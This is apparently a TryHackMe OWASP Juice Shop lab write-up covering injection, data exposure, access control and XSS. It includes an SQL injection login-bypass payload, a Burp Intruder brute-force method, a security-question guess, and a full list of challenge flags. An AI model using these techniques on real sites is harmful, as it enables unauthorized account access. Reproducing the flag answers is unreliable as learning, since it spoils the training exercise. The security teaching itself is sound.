Introduction
We covered broken authentication and SQL injection walkthrough as part of OWASP Juice Shop from TryHackMe. we will look at OWASP’s TOP 10 vulnerabilities in web applications. You will find these in all types of web applications. But for today we will be looking at OWASP’s own creation, Juice Shop!.
HackTheBox Certified Penetration Testing Specialist (CPTS) Study Notes
Vulnerabilities Covered
Injection vulnerabilities are quite dangerous to a company as they can potentially cause downtime and/or loss of data. Identifying injection points within a web application is usually quite simple, as most of them will return an error. SQL Injection is when an attacker enters a malicious or malformed query to either retrieve or tamper data from a database. And in some cases, log into accounts. Command Injection is when web applications take input or user-controlled data and run them as system commands. An attacker may tamper with this data to execute their own system commands. This can be seen in applications that perform misconfigured ping tests. Email injection is a security vulnerability that allows malicious users to send email messages without prior authorization by the email server. These occur when the attacker adds extra data to fields, which are not interpreted by the server correctly.
A web application should store and transmit sensitive data safely and securely. But in some cases, the developer may not correctly protect their sensitive data, making it vulnerable. Most of the time, data protection is not applied consistently across the web application making certain pages accessible to the public. Other times information is leaked to the public without the knowledge of the developer, making the web application vulnerable to an attack.
Modern-day systems will allow for multiple users to have access to different pages. Administrators most commonly use an administration page to edit, add and remove different elements of a website. You might use these when you are building a website with programs such as Weebly or Wix. When Broken Access Control exploits or bugs are found, it will be categorised into one of two types: Horizontal Privilege Escalation which Occurs when a user can perform an action or access data of another user with the same level of permissions and Vertical Privilege Escalation which Occurs when a user can perform an action or access data of another user with a higher level of permissions.
XSS or Cross-site scripting is a vulnerability that allows attackers to run javascript in web applications. These are one of the most found bugs in web applications. Their complexity ranges from easy to extremely hard, as each web application parses the queries in a different way. There are three major types of XSS attacks: DOM XSS (Document Object Model-based Cross-site Scripting) uses the HTML environment to execute malicious javascript. This type of attack commonly uses the <script></script> HTML tag. Persistent XSS is javascript that is run when the server loads the page containing it. These can occur when the server does not sanitise the user data when it is uploaded to a page. These are commonly found on blog posts. Reflected XSS is javascript that is run on the client-side end of the web application. These are most commonly found when the server doesn’t sanitise search data.
Task 1 – SQL Injection:
- The first task involves exploiting SQL injection to log in as the admin user. SQL injection is used to bypass authentication by injecting payloads that manipulate the SQL query. A payload like
"' OR 1=1--"
is used to bypass the login mechanism, allowing access to the admin account, thus demonstrating how weak input validation can be exploited in insecure applications.
Task 2 – Logging in as a Vendor:
- After logging out of the admin account, the next objective is to log in as a vendor. The process is similar, using SQL injection to bypass login for the vendor account. This showcases the potential to target specific accounts once basic SQL injection is successful.
Task 3 – Brute-forcing the Admin Password:
- The next challenge is to guess the admin password through brute force. Using tools like Burp Suite’s Intruder, a common password word list is loaded, and attempts are automated to identify the correct password based on HTTP response codes (200 for a successful login). The password identified is then used to log in.
Task 4 – Resetting Passwords via Weak Security Questions:
- The final task involves exploiting the password reset mechanism. By leveraging a common security question (e.g., “What is your eldest sibling’s middle name?”), and with contextual hints from the scenario (references to Star Trek characters), the answer is deduced to be “Samuel.” This demonstrates how easily security questions can be compromised with minimal research or social engineering.
Challenge Answers
Question #1: What’s the Administrator’s email address?
admin@juice-sh.op
Question #2: What parameter is used for searching?
q
Question #3: What show does Jim reference in his review?
Star Trek
Question #1: Log into the administrator account!
32a5e0f21372bcc1000a6088b93b458e41f0e02a
Question #2: Log into the Bender account!
fb364762a3c102b2db932069c0e6b78e738d4066
Question #1: Bruteforce the Administrator account’s password!
c2110d06dc6f81c67cd8099ff0ba601241f1ac0e
Question #2: Reset Jim’s password!
094fbc9b48e525150ba97d05b942bbf114987257
Question #1: Access the Confidential Document!
edf9281222395a1c5fee9b89e32175f1ccf50c5b
Question #2: Log into MC SafeSearch’s account!
66bdcffad9e698fd534003fbb3cc7e2b7b55d7f0
Question #3: Download the Backup file!
bfc1e6b4a16579e85e06fee4c36ff8c02fb13795
Question #1: Access the administration page!
946a799363226a24822008503f5d1324536629a0
Question #2: View another user’s shopping basket!
41b997a36cc33fbe4f0ba018474e19ae5ce52121
Question #3: Remove all 5-star reviews!
50c97bcce0b895e446d61c83a21df371ac2266ef
Question #1: Perform a DOM XSS!
9aaf4bbea5c30d00a1f5bbcfce4db6d4b0efe0bf
Question #2: Perform a persistent XSS!
149aa8ce13d7a4a8a931472308e269c94dc5f156
Question #3: Perform a reflected XSS!
23cefee1527bde039295b2616eeb29e1edc660a0
Access the /#/score-board/ page
7efd3174f9dd5baa03a7882027f2824d2f72d86e
Video Walkthrough(s)